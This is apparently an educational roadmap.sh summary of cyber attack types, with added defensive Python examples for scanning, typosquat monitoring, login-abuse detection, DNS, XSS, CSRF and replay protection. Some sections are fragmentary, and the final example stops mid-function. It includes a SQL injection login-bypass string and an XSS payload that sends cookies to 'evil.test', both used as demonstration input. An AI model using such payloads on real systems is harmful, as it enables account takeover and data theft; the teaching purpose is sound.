Summary of Cyber Attack Types
© roadmap.sh
Philipp Bùi Đỗ
Contents
Phishing
Vishing
Whaling
Smishing
Spam
Spim
Shoulder Surfing
Dumpster Diving
Tailgating
Zero Day
Social Engineering
Reconnaissance
Impersonation
Watering Hole Attack
Drive by Attack
Typo Squatting
Brute Force Attacks
Password Spray Attacks
DoS vs DDoS
MITM
ARP Poisoning
Evil Twin
DNS Poisoning
Spoofing
Deauth Attack
VLAN Hopping
Rogue Access Point
War-driving/dialing
Buffer Overflow
Memory Leak
XSS
SQL Injection
CSRF
Replay Attack
Pass the Hash
Directory Traversal
Malware
Phishing
Vishing
Vishing, or voice phishing, involves attackers using phone calls or voice
messages to persuade victims into revealing sensitive information, such as
banking details or passwords. Vishing attacks often rely on social
engineering tactics, tricking the target into believing they’re speaking with a
legitimate company representative or authority figure.
Whaling
Whaling is a specific type of phishing attack that targets high-profile
individuals, such as executives, celebrities, or politicians. These attacks tend
to be more targeted and sophisticated, as the attacker has likely conducted
extensive research on the victim.
Smishing
Smishing, or SMS phishing, is the act of using text messages to deceive
victims into revealing sensitive information or downloading malicious
software. The attacker may include a shortened URL or a phone number,
attempting to trick the victim into following the link or calling the number.
By staying informed about these various attack types, you can better protect
yourself and your organization from falling victim to cyber threats. Remain
vigilant and ensure you have proper security measures in place to minimize
the risk of these attacks.
Spam
Spam refers to any unwanted, unsolicited, or irrelevant messaging sent over
the internet, usually to a large number of users, for the purposes of
advertising, phishing, or spreading malware. These messages are typically
sent via email, which is why they are often called “spam emails.” Spam may
contain malicious attachments or links that, when clicked, download malware
or lead users to compromised websites.
Spim
Spim, or “spam over instant messaging,” is similar to spam but occurs over
instant messaging (IM) services, such as Facebook Messenger, WhatsApp,
and others. The main difference between spam and spim is the medium
through which the unwanted messages are sent. Just like spam, spim can be
used for advertising, spreading malware, or conducting phishing attacks.
Set your IM service’s privacy settings to limit who can message you
Be cautious when clicking on links or attachments from unknown or
suspicious accounts
Block or report spim accounts
Keep your IM client software updated
Shoulder Surfing
Shoulder surfing is a type of social engineering attack where an attacker
observes someone’s screen, keyboard, or any other device to gain
unauthorized access to sensitive information. It is typically performed by
secretly watching the victim during data entry, either directly or indirectly
through reflections, smartphones, or other recording equipment.
By staying cautious and adopting these security measures, you can greatly
reduce the risk of shoulder surfing and protect your sensitive data from
unauthorized access.
Dumpster Diving
Dumpster diving is a low-tech but potentially effective method used by
attackers to gather sensitive and valuable information by physically
searching through an organization’s trash. Dumpster divers often target
discarded documents such as old memos, printouts, and reports that may
How it works
Attackers search public and private trash receptacles for anything that can
inform an attack: names and internal phone numbers, account identifiers,
printed emails, invoices, or passwords written on discarded notes.
Individually these scraps look harmless; pieced together, they can give an
attacker a detailed picture of the organization's internal workings and the
material for a convincing impersonation or a direct login to protected
systems.
Countermeasures
Tailgating
Tailgating, also known as “piggybacking”, is a social engineering technique
used by attackers to gain unauthorized access to secure facilities or systems
by following closely behind a legitimate user. This attack exploits the human
tendency to trust others and help them out in various situations.
How it works
Securing Access: Once inside, the attacker may even steal a physical
access card or exploit other vulnerabilities to secure long-term access.
Prevention Measures
Strict policies: Enforce strict policies regarding holding doors open for
others or allowing individuals into secure areas without proper
credentials.
Zero Day
A zero-day attack exploits a software vulnerability that is unknown to the
software's developer, so it has not been disclosed or patched and no fix
exists at the time the exploit is used. This type of attack, also known as a
zero-day exploit, is
Characteristics
There are certain characteristics that make zero day attacks particularly
dangerous, such as:
Speed: because no patch or detection signature exists yet, a zero-day
exploit can be used before defenders have anything to deploy against it,
giving attackers a high success rate.
Consequences
Financial losses
Reputation damage
Mitigation Strategies
Social Engineering
Social engineering is a subtle yet highly effective method of manipulation
that plays on human emotions and behavior to gain unauthorized access to
sensitive information. It relies on psychological tactics, rather than technical
ones, to deceive people into providing confidential data, allowing
unauthorized access, or performing actions that compromise cybersecurity.
Preventive Measures
Reconnaissance
Reconnaissance is a crucial stage in any cyber attack and refers to the
process of gathering information about potential targets, their systems,
networks, and vulnerabilities. This information is used by attackers to select
which tactics, techniques, or tools will be most effective when attempting to
compromise a target system or organization. Reconnaissance can be divided
into two primary methods: active and passive.
Active Reconnaissance
Nmap: A network scanner that can discover hosts, services, and open
ports.
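Active reconnaissance touches the target directly, and the most basic form of it is the TCP connect() scan that tools such as Nmap perform (`nmap -sT`): complete a three-way handshake on each port and record which ones accept. The following is an added example, not code from the original page or from the Nmap project, that implements that scan against a throwaway listener on loopback so it runs offline; the listener, the port window and the host address are constructed for the demonstration.

```python
import socket
import threading
from contextlib import closing


def start_dummy_service(host="127.0.0.1"):
    """Start a throwaway TCP listener on an OS-chosen port so the scan below
    has a known open port to find (constructed for this example)."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind((host, 0))
    srv.listen(5)
    port = srv.getsockname()[1]

    def serve():
        # Accept and immediately close connections until the socket is shut down.
        while True:
            try:
                conn, _ = srv.accept()
                conn.close()
            except OSError:
                break

    threading.Thread(target=serve, daemon=True).start()
    return srv, port


def connect_scan(host, ports, timeout=0.5):
    """TCP connect() scan: a full three-way handshake per port, the same
    technique as `nmap -sT`. Returns the sorted list of ports that accepted.
    Closed ports on loopback answer with an immediate RST (connection refused);
    a filtered port on a remote host would simply hit the timeout instead."""
    open_ports = []
    for port in ports:
        with closing(socket.socket(socket.AF_INET, socket.SOCK_STREAM)) as s:
            s.settimeout(timeout)
            # connect_ex returns 0 on success instead of raising on failure.
            if s.connect_ex((host, port)) == 0:
                open_ports.append(port)
    return sorted(open_ports)


def demo():
    """Scan a small window of ports around the dummy listener and return
    (listener_port, ports_found_open)."""
    srv, open_port = start_dummy_service()
    try:
        candidates = range(open_port - 3, open_port + 4)
        found = connect_scan("127.0.0.1", candidates)
    finally:
        try:
            srv.shutdown(socket.SHUT_RDWR)  # wakes the blocked accept() on Linux
        except OSError:
            pass
        srv.close()
    return open_port, found


if __name__ == "__main__":
    port, found = demo()
    print(f"listener on {port}; scan found open ports: {found}")
```

Every connection this scan makes is a complete handshake, so it shows up in the target's application logs and connection tables; that is exactly the noise that makes active reconnaissance detectable, and why attackers prefer passive sources for as long as they can.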
Passive Reconnaissance
Impersonation
Impersonation is a type of cyber attack where an attacker pretends to be a
legitimate user, system, or device to gain unauthorized access or manipulate
their target. This kind of attack can happen through various channels like
email, phone calls, social media, or instant messaging platforms.
Impersonation attacks mainly aim to deceive the target into providing
sensitive information, executing malicious actions, or gaining unauthorized
access to secure systems.
Watering Hole Attack
In this type of attack, the attacker does not directly target the victims;
instead, they compromise websites that the targeted users commonly visit, so
that the malicious content is delivered by a site the victims already trust.
Here's a step-by-step breakdown of a typical watering hole attack:
Drive by Attack
A Drive-by Attack is a common cyber security threat where an attacker
aims to infect a user’s computer or device by exploiting vulnerabilities in
their web browser or its plugins. Typically, users unknowingly fall victim to
drive-by attacks when they visit a malicious or compromised website, which
in turn automatically executes the malicious code.
Typo Squatting
Typo squatting, also known as URL hijacking (a form of cybersquatting), is a
malicious technique that targets internet users who mistype a website
address in their browser. The attacker registers domain names that differ
from the legitimate one by a common typographical error (a dropped, doubled,
transposed or adjacent-key character, a look-alike character such as 1 for
l, or a slip in the top-level domain) and hosts a fake website there that
closely resembles the real one. The goal is usually to spread malware, steal
personal or financial information, sell counterfeit products, or support
phishing campaigns.
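The same typo patterns an attacker uses to pick domains can be generated defensively to watch for registrations that imitate your own. The block below is an added example, not from the original page: it enumerates single-edit variants of a domain (omission, repeated key, transposition, adjacent key, homoglyph, and slips in the TLD) and intersects them with a constructed list standing in for a domain-registration feed. The keyboard and homoglyph tables are deliberately partial.

```python
# Constructed for this example: look-alike domains an analyst might receive
# from a domain-registration monitoring feed. Only some imitate example.com.
OBSERVED_REGISTRATIONS = {
    "exmaple.com", "exampel.com", "examp1e.com", "exarnple.com",
    "example.co", "totally-unrelated.net", "examples.org",
}

# Partial keyboard-adjacency and homoglyph tables (enough for the demo; a real
# tool carries a full QWERTY map and the Unicode confusables list).
KEYBOARD_NEIGHBOURS = {"a": "qwsz", "e": "wrsd", "l": "kop", "m": "njk",
                       "p": "ol", "x": "zsdc"}
HOMOGLYPHS = {"l": ["1", "i"], "o": ["0"], "m": ["rn"], "e": ["3"],
              "i": ["l", "1"]}


def label_variants(label):
    """All single-edit typo variants of one DNS label."""
    out = set()
    for i, ch in enumerate(label):
        out.add(label[:i] + label[i + 1:])                  # omission
        out.add(label[:i] + ch + label[i:])                 # repeated key
        if i + 1 < len(label):                              # transposition
            out.add(label[:i] + label[i + 1] + ch + label[i + 2:])
        for k in KEYBOARD_NEIGHBOURS.get(ch, ""):           # adjacent key
            out.add(label[:i] + k + label[i + 1:])
        for g in HOMOGLYPHS.get(ch, []):                    # look-alike chars
            out.add(label[:i] + g + label[i + 1:])
    out.discard(label)
    out.discard("")
    return out


def typosquat_candidates(domain):
    """Variants of the second-level label plus slips in the TLD itself
    ("example.co", "example.cm"), which are registered just as eagerly."""
    label, _, tld = domain.partition(".")
    candidates = {v + "." + tld for v in label_variants(label)}
    candidates |= {label + "." + v for v in label_variants(tld) if len(v) >= 2}
    return candidates


def find_squats(domain, registered):
    """Registered names that are a one-edit typo of `domain`, sorted."""
    return sorted(typosquat_candidates(domain) & set(registered))


if __name__ == "__main__":
    print(find_squats("example.com", OBSERVED_REGISTRATIONS))
```

Running `find_squats("example.com", OBSERVED_REGISTRATIONS)` flags the five imitations and ignores the unrelated names; the candidate set is small enough (a few hundred names for a short domain) to check daily against WHOIS or certificate-transparency logs.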
Double-check URLs: Always double-check the URL you type into your
browser to ensure you are accessing the intended website.
Search Engines: If unsure about the correct URL, use search engines
to locate the desired website.
becoming a victim. Always verify that you’re visiting the correct website
before entering any personal or sensitive information.
Brute Force Attacks
To mitigate the risks of a brute force attack, implement the following best
practices:
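Brute force and password spraying look different in authentication logs: a brute-force attempt piles many failures onto one account from one source, while a spray touches many accounts with one or two guesses each so that no single account trips a lockout. The following detection logic is an added example, not from the original page, run over a constructed authentication log; the log format, thresholds and addresses are assumptions for the demonstration.

```python
import re
from collections import Counter, defaultdict

# Constructed sample log (timestamp, result, user, source address).
AUTH_LOG = """\
2024-05-01T10:00:01Z FAIL user=alice src=10.0.0.5
2024-05-01T10:00:02Z FAIL user=alice src=10.0.0.5
2024-05-01T10:00:03Z FAIL user=alice src=10.0.0.5
2024-05-01T10:00:04Z FAIL user=alice src=10.0.0.5
2024-05-01T10:00:05Z FAIL user=alice src=10.0.0.5
2024-05-01T10:00:06Z FAIL user=alice src=10.0.0.5
2024-05-01T10:05:00Z FAIL user=bob src=203.0.113.9
2024-05-01T10:05:01Z FAIL user=carol src=203.0.113.9
2024-05-01T10:05:02Z FAIL user=dave src=203.0.113.9
2024-05-01T10:05:03Z FAIL user=erin src=203.0.113.9
2024-05-01T10:05:04Z FAIL user=frank src=203.0.113.9
2024-05-01T10:05:05Z OK user=grace src=203.0.113.9
2024-05-01T10:09:00Z FAIL user=heidi src=192.0.2.7
2024-05-01T10:09:20Z OK user=heidi src=192.0.2.7
"""

LINE_RE = re.compile(
    r"^(?P<ts>\S+) (?P<result>OK|FAIL) user=(?P<user>\S+) src=(?P<src>\S+)$")


def parse(log):
    """Turn the raw log into a list of event dicts, skipping malformed lines."""
    events = []
    for line in log.splitlines():
        m = LINE_RE.match(line.strip())
        if m:
            events.append(m.groupdict())
    return events


def detect(events, brute_threshold=5, spray_min_users=5, spray_max_per_user=2):
    """Brute force: >= brute_threshold failures for one (source, user) pair.
    Spray: one source failing against >= spray_min_users distinct users with
    at most spray_max_per_user attempts each (staying under lockout)."""
    fails = Counter((e["src"], e["user"]) for e in events if e["result"] == "FAIL")

    brute_force = sorted(pair for pair, n in fails.items() if n >= brute_threshold)

    users_by_src = defaultdict(Counter)
    for (src, user), n in fails.items():
        users_by_src[src][user] = n
    password_spray = sorted(
        src for src, per_user in users_by_src.items()
        if len(per_user) >= spray_min_users
        and max(per_user.values()) <= spray_max_per_user)

    # A success from a spraying source is the event worth chasing first.
    spray_successes = sorted(
        (e["src"], e["user"]) for e in events
        if e["result"] == "OK" and e["src"] in password_spray)

    return {"brute_force": brute_force, "password_spray": password_spray,
            "spray_successes": spray_successes}


if __name__ == "__main__":
    print(detect(parse(AUTH_LOG)))
```

On the sample log, `10.0.0.5` is reported for brute-forcing `alice`, `203.0.113.9` for spraying, and the spray's one successful login (`grace`) is surfaced separately. Per-account lockouts stop the first pattern but not the second, which is why spray detection has to key on the source rather than the account.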
DoS vs DDoS
In this section, we will discuss the differences between DoS (Denial of
Service) and DDoS (Distributed Denial of Service) attacks, two common
network-based attacks that can severely impact the availability and
performance of targeted systems.
A DDoS attack is similar to a DoS attack in its intent, but it utilizes multiple
computers or devices (usually compromised by malware) to launch the
attack. These devices, collectively called a “botnet”, send an overwhelming
amount of requests to the target system, making it even harder to mitigate
the attack and protect the resources.
Key Differences
In conclusion, both DoS and DDoS attacks aim to disrupt the availability of a
target system by overwhelming its resources. However, their key differences
lie in the scale and complexity of the attack, with DDoS attacks being more
powerful and more challenging to defend against. It is crucial for
organizations to implement robust security measures to detect and mitigate
these attacks to maintain the availability and integrity of their systems.
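The scale difference has a concrete consequence for defenders: a per-source rate limit neutralises a single-source DoS but is blind to a DDoS in which every bot stays under the limit, leaving only aggregate capacity controls, which also drop legitimate users. The simulation below is an added example, not from the original page; the limits, window and the two constructed traffic patterns are assumptions chosen to make the contrast visible.

```python
from collections import Counter, defaultdict, deque


class SlidingWindowLimiter:
    """Sliding-window limits: requests per window per source, plus a global cap
    standing in for the capacity of the service itself."""

    def __init__(self, window_seconds, per_source_limit, global_limit):
        self.window = window_seconds
        self.per_source_limit = per_source_limit
        self.global_limit = global_limit
        self.per_source = defaultdict(deque)
        self.global_hits = deque()

    def allow(self, source, now):
        cutoff = now - self.window
        while self.global_hits and self.global_hits[0] <= cutoff:
            self.global_hits.popleft()
        q = self.per_source[source]
        while q and q[0] <= cutoff:
            q.popleft()
        if len(q) >= self.per_source_limit:
            return "blocked_per_source"
        if len(self.global_hits) >= self.global_limit:
            return "blocked_global"   # capacity exhausted: the outage itself
        q.append(now)
        self.global_hits.append(now)
        return "served"


def simulate(requests, per_source_limit=50, global_limit=500, window=1.0):
    """requests: iterable of (timestamp, source); returns outcome counts."""
    limiter = SlidingWindowLimiter(window, per_source_limit, global_limit)
    return Counter(limiter.allow(src, t) for t, src in requests)


# Constructed traffic: 1000 requests within one second in both cases.
DOS_TRAFFIC = [(i / 1000, "198.51.100.7") for i in range(1000)]
DDOS_TRAFFIC = [(i / 1000, f"10.{i // 256}.{i % 256}.1") for i in range(1000)]


def demo():
    return {"dos": simulate(DOS_TRAFFIC), "ddos": simulate(DDOS_TRAFFIC)}


if __name__ == "__main__":
    for name, outcome in demo().items():
        print(name, dict(outcome))
```

For the single-source flood the per-source limit admits 50 requests and discards 950 before they consume capacity. For the 1000-bot flood the per-source limit never fires; the service serves 500 and the other 500 (real users included) hit the global cap. That is the gap upstream scrubbing, anycast and challenge-based filtering exist to fill.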
MITM
A Man-In-The-Middle (MITM) attack occurs when a malicious actor intercepts
the communication between two parties without their consent, with the
objective of eavesdropping or manipulating the exchanged data. By this
method, attackers may steal sensitive information, tamper with the
transmitted data, or impersonate the involved parties to gain unauthorized
control or access.
DNS Spoofing: The attacker modifies the DNS records to redirect the
victim to a malicious website instead of the intended one.
ARP Spoofing: The attacker sends forged ARP replies so that the victim's
ARP cache associates the attacker's MAC (Media Access Control) address
with the IP address of another host, typically the default gateway,
redirecting the victim's traffic through the attacker's device.
Use HTTPS and encryption: Encrypt all sensitive traffic with authenticated
protocols such as HTTPS (TLS), and make sure clients verify the server
certificate, otherwise an interceptor can simply present its own. SSL and
early TLS versions are obsolete and should be disabled.
ARP Poisoning
ARP Poisoning, also known as ARP spoofing or ARP cache poisoning, is a
cyber attack technique that exploits the Address Resolution Protocol (ARP) in
a computer network. ARP is responsible for mapping an IP address to a
corresponding Media Access Control (MAC) address, so that data packets can
be correctly transmitted to the intended network device. An attacker can use
ARP poisoning to intercept, modify, or disrupt communications between
network devices.
How It Works:
Other devices on the network treat the attacker’s MAC address as the
legitimate one for the targeted IP address, updating their ARP tables
accordingly.
As a result, data packets that were meant for the targeted device are
now sent to the attacker instead, potentially enabling them to
eavesdrop, modify, or disrupt network traffic.
Consequences:
Evil Twin
An Evil Twin Attack is a malicious tactic used by cybercriminals to deceive
users by creating a fake wireless Access Point (AP) that mimics the
characteristics of a legitimate one. This rogue access point usually has the
same network name (SSID) and security settings as a genuine AP, making it
difficult for users to differentiate between the two.
How it works
The attacker sets up their own hardware in the vicinity of the targeted
wireless network and configures a rogue AP with the same SSID and
security settings as the genuine network.
Unsuspecting users connect to the rogue AP, thinking it’s the legitimate
network.
The attacker can now intercept and, in some cases, alter the user’s
data transmitted over the network. This can include sensitive
information such as login credentials, credit card details, and personal
conversations.
Verify the SSID: Make sure you are connecting to the correct SSID.
Be cautious of networks with similar names or those that don’t require
a password.
DNS Poisoning
DNS Poisoning, also known as DNS Cache Poisoning or DNS Spoofing,
is a type of cyberattack where cyber-criminals manipulate the Domain Name
System (DNS) responses to redirect users to malicious websites. Let’s dive
deeper to understand how it works and its potential impact.
The attacker intercepts the DNS request and injects false DNS
information into the DNS resolver’s cache.
The DNS resolver then returns the falsified IP address to the user.
Here are some steps you can take to prevent and mitigate the risk of DNS
poisoning:
Use Secure DNS Resolvers: Choose a secure DNS resolver that has
built-in mechanisms to prevent DNS poisoning, such as validating
DNSSEC signatures.
Monitor Your DNS Traffic: Regularly monitoring DNS query logs can
help you identify suspicious patterns or unusual activities, which may
indicate DNS poisoning attempts.
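A forged answer only poisons the cache if the resolver accepts it, so the checks a resolver applies to incoming responses are the first line of defence: the transaction ID and destination port must match an outstanding query, the question section must match, and no record outside the queried server's bailiwick may be cached. The model below is an added example, not from the original page and not real wire-format DNS; it represents queries and responses as dataclasses and shows a guessed-ID forgery, an in-ID forgery smuggling an out-of-bailiwick record, and the genuine answer. Names and addresses are from documentation ranges.

```python
import secrets
from dataclasses import dataclass


@dataclass
class Query:
    name: str
    qtype: str
    txid: int
    src_port: int
    zone: str       # zone the queried server is authoritative for (its bailiwick)


@dataclass
class Response:
    txid: int
    dst_port: int
    name: str
    qtype: str
    records: list   # (owner, rtype, value) triples


def in_bailiwick(owner, zone):
    o, z = owner.lower().rstrip("."), zone.lower().rstrip(".")
    return o == z or o.endswith("." + z)


class Resolver:
    """Minimal caching resolver model: random 16-bit ID and random source port
    per query, and strict acceptance checks on every response."""

    def __init__(self):
        self.cache = {}
        self.pending = {}

    def send_query(self, name, qtype, zone):
        q = Query(name, qtype, secrets.randbelow(1 << 16),
                  1024 + secrets.randbelow(64512), zone)
        self.pending[(q.txid, q.src_port)] = q
        return q

    def receive(self, resp):
        q = self.pending.get((resp.txid, resp.dst_port))
        if q is None:
            return "rejected: txid/port match no outstanding query"
        if (resp.name.lower(), resp.qtype) != (q.name.lower(), q.qtype):
            return "rejected: question section mismatch"
        for owner, _, _ in resp.records:
            if not in_bailiwick(owner, q.zone):
                return f"rejected: {owner} is outside {q.zone}"
        for owner, rtype, value in resp.records:
            self.cache[(owner.lower(), rtype)] = value
        del self.pending[(resp.txid, resp.dst_port)]
        return "accepted"


def demo():
    resolver = Resolver()
    q = resolver.send_query("www.example.com", "A", zone="example.com")
    # Attacker guessing the ID (off by one here); with a random port as well
    # there are ~2^32 combinations to guess before the real answer arrives.
    guessed = Response(q.txid ^ 0x1, q.src_port, q.name, "A",
                       [("www.example.com", "A", "203.0.113.10")])
    # Attacker who knows the ID tries to plant a record for an unrelated name.
    poisoned = Response(q.txid, q.src_port, q.name, "A",
                        [("www.example.com", "A", "198.51.100.5"),
                         ("login.bank.test", "A", "203.0.113.10")])
    legitimate = Response(q.txid, q.src_port, q.name, "A",
                          [("www.example.com", "A", "198.51.100.5")])
    outcomes = [resolver.receive(r) for r in (guessed, poisoned, legitimate)]
    return outcomes, dict(resolver.cache)


if __name__ == "__main__":
    print(demo())
```

Only the genuine response reaches the cache. Port randomisation and bailiwick checking are what modern resolvers do; DNSSEC validation goes further by letting the resolver verify the records cryptographically rather than trusting that a matching response is authentic.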
Spoofing
Spoofing is a type of cyber attack where an attacker impersonates or
masquerades as another entity (person or system) to gain unauthorized
access to sensitive information, manipulate communications or bypass
network security measures. Spoofing can come in various forms, including:
IP Spoofing
Email Spoofing
Caller ID Spoofing
Deauth Attack
A Deauthentication (Deauth) Attack is a type of Denial-of-Service (DoS)
attack that targets Wi-Fi networks. It abuses the fact that 802.11
management frames were unauthenticated before 802.11w (Protected Management
Frames): the attacker forges deauthentication frames that appear to come
from the access point (or from the client) and sends them to connected
clients, which honour the frame and drop their association. Repeating the
frames keeps victims off the network; even a single forged frame forces a
reconnection, during which the WPA handshake can be captured or the client
steered towards an evil twin.
As the author of this guide, I advise you to stay diligent and follow the best
practices in order to safeguard your network from deauth attacks and other
security threats.
VLAN Hopping
VLAN hopping is a network-based attack that exploits weaknesses in how
switches negotiate and tag VLAN trunks in a local area network (LAN), for
example automatic trunk negotiation on an access port or 802.1Q double
tagging. The objective is to send traffic into, or receive traffic from, a
VLAN the attacker's port is not a member of, bypassing the segmentation the
VLANs were meant to enforce.
Rogue Access Point
Here are some measures to help detect and prevent rogue access points:
War-driving/dialing
War Driving
Mapping: After detecting the wireless signals, the attacker maps them
using GPS or other location-based services.
War Dialing
War dialing is a similar attack method but involves calling numerous phone
lines in search of modems and fax machines. War dialing allows the attacker
to identify insecure phone lines and unauthorized access points.
Analysis: The attacker will analyze the phone lines to assess their
security and vulnerabilities.
Prevention Strategies
To protect your network against war driving or war dialing, it’s important to:
Buffer Overflow
A buffer overflow is a common type of software vulnerability that occurs
when a program writes more data into a fixed-size buffer than it can hold
(or reads past its end), so that the excess overwrites adjacent data in
memory. The overflow can corrupt data and lead to unexpected behaviour, from
application crashes to the execution of attacker-controlled code when the
overwritten memory includes return addresses or function pointers.
Exploitation
Prevention Techniques
Use safe APIs and libraries that check the size of the data before
copying it into the buffer.
Memory Leak
A memory leak occurs when a program or application allocates memory but
fails to release it back to the system when it is no longer needed. This can
lead to an accumulation of memory resources that are not in use, ultimately
causing a system’s performance to degrade or even crash as the available
memory resources become exhausted.
XSS
Cross-site scripting (XSS) is a type of cybersecurity vulnerability commonly
found in web applications. It occurs when an attacker injects malicious
scripts into webpages viewed by other users. These scripts can be used to
steal sensitive information, such as user credentials or sensitive data. XSS
vulnerabilities can lead to various consequences, like account takeover,
phishing attacks, and other malicious activities.
Secure HTTP Headers: Send a Content-Security-Policy header that restricts
where scripts may load from, together with X-Content-Type-Options: nosniff
and X-Frame-Options (or CSP frame-ancestors). The legacy X-XSS-Protection
header is ignored by modern browsers and should not be relied on.
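The root cause of XSS is untrusted text landing in HTML without being encoded for the context it lands in, and the fix has to cover every context, attribute values included. The block below is an added example, not from the original page: a vulnerable renderer that concatenates a display name into an attribute and a comment into element text, its hardened counterpart, and the response headers that limit the damage if an escape is missed. The payloads and the hypothetical `evil.test` host are constructed for the demonstration.

```python
import html

# Constructed attacker inputs: a "display name" aimed at the attribute context
# and a "comment" aimed at the text context.
ATTACKER_NAME = '" onmouseover="alert(document.cookie)'
ATTACKER_COMMENT = '<script>fetch("https://evil.test/?c=" + document.cookie)</script>'


def render_unsafe(name, comment):
    """Vulnerable: user input is concatenated straight into HTML."""
    return (f'<div class="comment" data-author="{name}">'
            f'<b>{name}</b>: {comment}</div>')


def render_safe(name, comment):
    """Hardened: every untrusted value is HTML-escaped. quote=True also
    escapes quote characters, which is what keeps the name inside the
    (always quoted) attribute; unquoted attributes cannot be made safe this way."""
    safe_name = html.escape(name, quote=True)
    safe_comment = html.escape(comment, quote=True)
    return (f'<div class="comment" data-author="{safe_name}">'
            f'<b>{safe_name}</b>: {safe_comment}</div>')


def security_headers():
    """Defence in depth if an escape is missed somewhere. X-XSS-Protection is
    deliberately absent: modern browsers ignore it; CSP is the supported control."""
    return {
        "Content-Security-Policy":
            "default-src 'self'; script-src 'self'; object-src 'none'; base-uri 'none'",
        "X-Content-Type-Options": "nosniff",
        "X-Frame-Options": "DENY",
    }


if __name__ == "__main__":
    print(render_unsafe(ATTACKER_NAME, ATTACKER_COMMENT))
    print(render_safe(ATTACKER_NAME, ATTACKER_COMMENT))
```

In the unsafe output the name closes the `data-author` attribute and adds an event handler, and the comment is a live script element; in the safe output both arrive as inert text. Escaping is context-specific: a value placed inside a `<script>` block or a URL needs JavaScript or URL encoding instead, which is why templating engines with automatic contextual escaping are preferable to hand-written escapes.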
SQL Injection
SQL Injection is a type of cyber attack that targets web applications and
databases. This technique takes advantage of vulnerabilities in the
application’s code by injecting malicious SQL statements and exploiting them
to gain unauthorized access or to manipulate the data in a database.
Attackers can potentially use this technique to retrieve, modify, delete, or
even add data to the database without proper authorization.
In this case, $username and $password are replaced with the values
provided by the user. If an attacker enters the following input for the
username field, they can manipulate the query to bypass the password
check:
' OR 1=1 --
SELECT * FROM users WHERE username = '' OR 1=1 -- ' AND password = '$password'
As 1=1 is always true, the query returns a result, and the attacker gains
unauthorized access.
To protect your web applications from SQL Injection attacks, you should:
Validate User Input: Always validate and sanitize user input before
incorporating it into a SQL query. Use strict data types and validate
input against predefined patterns or value ranges.
CSRF
Cross-Site Request Forgery, or CSRF, is a type of attack that exploits the
trust that a user’s browser has in a web application. It tricks the user’s
browser into executing unwanted actions on a web application in which the
user is currently authenticated.
The user, while still authenticated to the web application, visits the
attacker’s website, which triggers the malicious code.
Data modifications
Privilege escalation
Account takeovers
Prevention Measures
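The standard defences are a per-session anti-CSRF token that the attacker's page cannot read, an Origin (or Referer) check, and the SameSite cookie attribute so the browser does not attach the session cookie to cross-site form posts at all. The block below is an added example, not from the original page: a minimal server-side handler for a money-transfer POST modelled as a dict, exercised with a legitimate request and two forged ones. The application origin `bank.test`, the session store and the request shape are assumptions for the demonstration.

```python
import hmac
import secrets

ALLOWED_ORIGIN = "https://bank.test"   # assumed origin of the application


class SessionStore:
    """In-memory sessions; each session carries its own random CSRF token."""

    def __init__(self):
        self._sessions = {}

    def create(self, user):
        sid = secrets.token_urlsafe(32)
        self._sessions[sid] = {"user": user, "csrf_token": secrets.token_urlsafe(32)}
        return sid

    def get(self, sid):
        return self._sessions.get(sid)


def session_cookie(sid):
    """SameSite=Lax stops the browser sending this cookie on cross-site POSTs,
    which on its own defeats the classic auto-submitted-form CSRF."""
    return f"session={sid}; Secure; HttpOnly; SameSite=Lax"


def handle_transfer(store, request):
    """request models a POST: {'cookies': {...}, 'headers': {...}, 'form': {...}}."""
    session = store.get(request.get("cookies", {}).get("session"))
    if session is None:
        return "rejected: no valid session"
    origin = request.get("headers", {}).get("Origin")
    if origin is not None and origin != ALLOWED_ORIGIN:
        return f"rejected: cross-site origin {origin}"
    submitted = request.get("form", {}).get("csrf_token", "")
    if not hmac.compare_digest(submitted, session["csrf_token"]):
        return "rejected: missing or wrong CSRF token"
    form = request["form"]
    return f"ok: {session['user']} transferred {form['amount']} to {form['to']}"


def demo():
    store = SessionStore()
    sid = store.create("alice")
    token = store.get(sid)["csrf_token"]   # embedded in the real form by the server
    legitimate = {"cookies": {"session": sid},
                  "headers": {"Origin": ALLOWED_ORIGIN},
                  "form": {"amount": "100", "to": "bob", "csrf_token": token}}
    # Forged: the attacker's page auto-submits a form. The browser may attach
    # the cookie, but the attacker can neither read the token nor set Origin.
    forged = {"cookies": {"session": sid},
              "headers": {"Origin": "https://evil.test"},
              "form": {"amount": "10000", "to": "mallory"}}
    forged_no_origin = {"cookies": {"session": sid}, "headers": {},
                        "form": {"amount": "10000", "to": "mallory"}}
    return [handle_transfer(store, r) for r in (legitimate, forged, forged_no_origin)]


if __name__ == "__main__":
    print(demo())
```

The token comparison uses `hmac.compare_digest` so timing does not leak the token. Note the order of checks: an Origin header, when present, is a cheap early reject, but the token check is what carries the guarantee, since older clients and some request paths omit Origin.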
Replay Attack
A Replay Attack is a malicious action where an attacker intercepts data
transmitted between two parties, records the data, and retransmits it at a
later time to create unauthorized access or gain some benefit. This type of
attack happens when the data sent by the original sender is not altered in
any way but simply replayed, making the system think that it is receiving a
legitimate request.
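What makes a replay possible is that nothing in the message binds it to a single delivery: a valid signature stays valid however often it is resent. The usual countermeasure is to sign a nonce and a timestamp along with the payload, reject timestamps outside a short window, and remember nonces seen inside that window. The exchange below is an added example, not from the original page, with both the sender's signing and the receiver's checks; the shared key and the fixed clock are constructed so the run is deterministic.

```python
import hashlib
import hmac
import json

SHARED_KEY = b"constructed-demo-key-not-for-real-use"   # assumed pre-shared key
MAX_SKEW_SECONDS = 30


def _canonical(body):
    # Stable serialisation so sender and receiver MAC exactly the same bytes.
    return json.dumps(body, sort_keys=True, separators=(",", ":")).encode()


def sign_message(key, payload, nonce, ts):
    """Sender: bind payload, nonce and timestamp together under one HMAC."""
    body = {"payload": payload, "nonce": nonce, "ts": ts}
    mac = hmac.new(key, _canonical(body), hashlib.sha256).hexdigest()
    return {**body, "mac": mac}


class Receiver:
    """Verifies the MAC, then freshness (timestamp), then uniqueness (nonce)."""

    def __init__(self, key, max_skew=MAX_SKEW_SECONDS):
        self.key = key
        self.max_skew = max_skew
        self.seen_nonces = set()

    def accept(self, message, now):
        body = {k: message[k] for k in ("payload", "nonce", "ts")}
        expected = hmac.new(self.key, _canonical(body), hashlib.sha256).hexdigest()
        if not hmac.compare_digest(expected, message.get("mac", "")):
            return "rejected: bad MAC"
        if abs(now - message["ts"]) > self.max_skew:
            return "rejected: timestamp outside window"
        if message["nonce"] in self.seen_nonces:
            return "rejected: nonce already used (replay)"
        self.seen_nonces.add(message["nonce"])
        return "accepted"


def demo():
    now = 1_700_000_000          # fixed clock for a deterministic run
    recv = Receiver(SHARED_KEY)
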